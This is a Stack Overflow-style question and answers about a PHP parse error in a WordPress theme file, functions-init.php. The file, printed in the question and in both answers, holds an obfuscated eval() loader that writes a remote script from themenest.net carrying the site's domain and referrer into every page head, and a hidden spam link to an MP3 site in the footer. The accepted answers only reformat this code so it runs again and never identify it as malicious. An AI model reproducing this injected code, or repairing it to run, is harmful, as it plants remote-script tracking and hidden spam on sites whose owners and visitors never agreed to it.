# Parse error: syntax error, unexpected '}'

Tags: php, wordpress, parsing, syntax

I wonder if somebody would spare a minute to look over a code and help me. I'm not php savvy and I need a bit of help.

I've installed a theme onto my wordpress, and when I activated it I got this error message:

Parse error: syntax error, unexpected '}' in /home/XXXXXXX/public_html/wp-content/themes/Avada/widgets/functions-init.php on line 1

The message displays on both my front end domain, and also on my back end wordpress admin area.

I'm guessing I've one too many or one too little brackets. But I'm not sure where. I'm unable to see the actual error, because I'm not familiar with php coding. All I know is it is in line 1 and it has to do with "}"

The whole file consists only of 2 code lines, and if anyone can help I'd really appreciate it.

This is the entire code as it appears in functions-init.php

```
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){?><script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script> <?php}add_action('wp_head', 'insert_jquery_slider');} ?>
<?php if (!function_exists('insert_jquery_slidernew')){function insert_jquery_slidernew(){?><a style="display:none;" href="http://freemp3x.com/adele-mp3-download.html">Adele songs downlload</a> <?php}add_action('wp_footer', 'insert_jquery_slidernew');} ?>
```

Can anyone help me please. I've goggled and I've searched forums, and the web, yet I didn't find solution.

Thanks ahead.

Answer (score 2, accepted):

This may be a mere question of code formatting, try this:

```
<?php
if (!function_exists('insert_jquery_slider')){
    function insert_jquery_slider(){
?>
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>
<?php
    }
    add_action('wp_head', 'insert_jquery_slider');
}

if (!function_exists('insert_jquery_slidernew'))
{
    function insert_jquery_slidernew(){
?>
<a style="display:none;" href="http://freemp3x.com/adele-mp3-download.html">Adele songs downlload</a>
<?php
    }

    add_action('wp_footer', 'insert_jquery_slidernew');
}
?>
```

Comment: Thank you so much Sébastien. The problem is fixed. 
Very kind of you to take the time to help out :)

Have a lovely weekend!

Comment: Sorry I had no idea I'm the one who is suppose to close the topic in this forum. In other forums mods do that. Please give me some time, I'm new to the forum. I'm looking for the so called "green checkmark" and how to close the topic. I can't seem to find it at the moment. I will do my best to figure it out soon. I appologise.

Comment: OK I found a check mark which was barely visible. I had no idea it is a button you are suppose to click on. I thought it was some pale line graphic. It ONLY turned green after I clicked it. sorry again.

Comment: No problem @Kay thanks for accepting my answer. You should take a minute to read this http://stackoverflow.com/about and you'll be able to reap all the benefits of stackoverflow.

Answer (score 1):

Such a code formatting issue:

```
<?php
if (!function_exists('insert_jquery_slider')) {
    function insert_jquery_slider()
    { ?>
    <script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>
    <?php } 
    add_action('wp_head', 'insert_jquery_slider');
}
if (!function_exists('insert_jquery_slidernew')) {
    function insert_jquery_slidernew()
    { ?>
    <a style="display:none;" href="http://freemp3x.com/adele-mp3-download.html">Adele songs downlload</a> 
    <?php }
    add_action('wp_footer', 'insert_jquery_slidernew');
}
?>
```

Please close the topic.
Thanks.

Comment: I don't think I can close the topic myself. I'm new, this is my first question and I have not much of "reputation". I've tried researching how to close a topic and I found out that in order to close my own topic I need at least 250 rep to be able to vote to close my own questions.

It says right here: http://meta.stackexchange.com/questions/10582/what-is-a-closed-or-on-hold-question

Please if I'm wrong can you point me in the right direction on how to close the topic? :)

Thanks